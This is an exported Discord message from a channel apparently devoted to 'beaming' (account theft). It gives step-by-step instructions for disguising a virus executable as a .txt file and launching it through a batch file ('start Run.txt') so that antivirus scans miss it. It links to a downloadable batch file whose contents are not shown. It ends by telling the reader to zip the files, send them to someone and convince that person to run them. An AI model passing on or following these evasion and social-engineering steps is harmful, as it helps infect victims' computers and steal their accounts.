==============================================================
Guild: VAULT ALL LOCKERS NEED |  /prediction
Channel: beaming methods / txt-logger
==============================================================

[PM] xeno#0666
1.) Download the following batch file. https://cdn.discordapp.com/attachments/899804319417769994/900891944165711912/FileSetup.bat Turn the exe into a txt by either renaming it some other fucking method idk. MAKE SURE THE FILE IS ACTUALLY A FUCKING TXT AND NOT A EXE

2.) Put the batch and the virus in the same folder

3.) Right click the batch and replace YourFileNameWithNoExtensionsHere with your file name. Do not put the file extension at the end

3.) Run the script you should get this error: https://media.discordapp.net/attachments/899303581449089034/899799098889207818/unknown.png

4.)Right click the batch and click edit. Delete everything there and replace it with 
start Run.txt

5.) Hit file save then exit

6.) Zip the files up and send them to someone. Convince them to open the batch and even run it through a virus total since it doesn't get flagged and only the txt does

{Embed}
https://media.discordapp.net/attachments/899303581449089034/899799098889207818/unknown.png
https://media.discordapp.net/attachments/899303581449089034/899799098889207818/unknown.png


==============================================================
Exported 1 message(s)
==============================================================
